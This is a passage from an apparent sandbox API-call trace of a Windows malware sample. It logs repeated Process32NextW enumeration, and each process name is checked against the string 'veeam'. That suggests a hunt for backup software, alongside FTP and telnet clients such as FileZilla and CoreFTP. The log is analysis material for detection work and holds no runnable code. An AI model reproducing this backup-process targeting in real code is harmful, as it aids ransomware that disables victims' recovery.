lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0091.973] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="veeam") returned 0x0 [0091.973] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0091.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.974] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3536d90 [0091.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3536d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0091.974] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0091.975] StrStrIA (lpFirst="nights-attending.exe", lpSrch="veeam") returned 0x0 [0091.975] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0091.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.976] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3542460 [0091.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3542460, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0091.976] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0091.976] StrStrIA (lpFirst="installed.exe", lpSrch="veeam") returned 0x0 [0091.976] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0091.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0091.977] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355cba0 [0091.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x355cba0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0091.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0091.977] StrStrIA (lpFirst="references compounds.exe", lpSrch="veeam") returned 0x0 [0091.977] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0091.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.979] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3536dd0 [0091.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3536dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0091.979] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0091.979] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="veeam") returned 0x0 [0091.979] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0091.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.980] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3536df0 [0091.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3536df0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0091.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0091.980] StrStrIA (lpFirst="registered try.exe", lpSrch="veeam") returned 0x0 [0091.980] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0091.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.982] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355cbc8 [0091.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x355cbc8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0091.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0091.982] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="veeam") returned 0x0 [0091.982] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0091.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.983] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542448 [0091.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3542448, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0091.983] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0091.983] StrStrIA (lpFirst="invite.exe", lpSrch="veeam") returned 0x0 [0091.983] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0091.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.984] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542400 [0091.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3542400, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0091.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0091.984] StrStrIA (lpFirst="idol.exe", lpSrch="veeam") returned 0x0 [0091.984] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0091.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.986] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355c9e8 [0091.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x355c9e8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0091.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0091.986] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="veeam") returned 0x0 [0091.986] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0091.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0091.987] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355cad8 [0091.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x355cad8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0091.987] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0091.987] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="veeam") returned 0x0 [0091.987] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0091.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.988] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542520 [0091.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3542520, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0091.988] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0091.988] StrStrIA (lpFirst="powell_jane.exe", lpSrch="veeam") returned 0x0 [0091.988] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0091.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.989] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35368b0 [0091.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35368b0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0091.989] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0091.989] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="veeam") returned 0x0 [0091.989] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0091.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.990] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542388 [0091.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3542388, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0091.991] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0091.991] StrStrIA (lpFirst="gainedshape.exe", lpSrch="veeam") returned 0x0 [0091.991] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0091.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.992] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35369f0 [0091.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35369f0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0091.992] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0091.992] StrStrIA (lpFirst="opens-versions.exe", lpSrch="veeam") returned 0x0 [0091.992] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0091.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.993] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355cb00 [0091.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x355cb00, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0091.993] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0091.993] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="veeam") returned 0x0 [0091.993] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0091.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.995] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542418 [0091.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3542418, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.995] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0091.995] StrStrIA (lpFirst="3dftp.exe", lpSrch="veeam") returned 0x0 [0091.995] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0091.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.996] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3536b10 [0091.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3536b10, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0091.996] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0091.996] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="veeam") returned 0x0 [0091.996] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0091.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.997] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35423e8 [0091.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35423e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0091.997] StrStrIA (lpFirst="alftp.exe", lpSrch="veeam") returned 0x0 [0091.997] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0091.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.998] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542430 [0091.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3542430, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0091.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0091.998] StrStrIA (lpFirst="barca.exe", lpSrch="veeam") returned 0x0 [0091.998] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0091.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.999] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35423a0 [0091.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35423a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0091.999] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0091.999] StrStrIA (lpFirst="bitkinex.exe", lpSrch="veeam") returned 0x0 [0091.999] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0092.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.001] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35423b8 [0092.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35423b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0092.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0092.001] StrStrIA (lpFirst="coreftp.exe", lpSrch="veeam") returned 0x0 [0092.001] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0092.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.002] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547768 [0092.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547768, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0092.002] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0092.002] StrStrIA (lpFirst="far.exe", lpSrch="veeam") returned 0x0 [0092.002] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0092.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.003] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3542478 [0092.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, 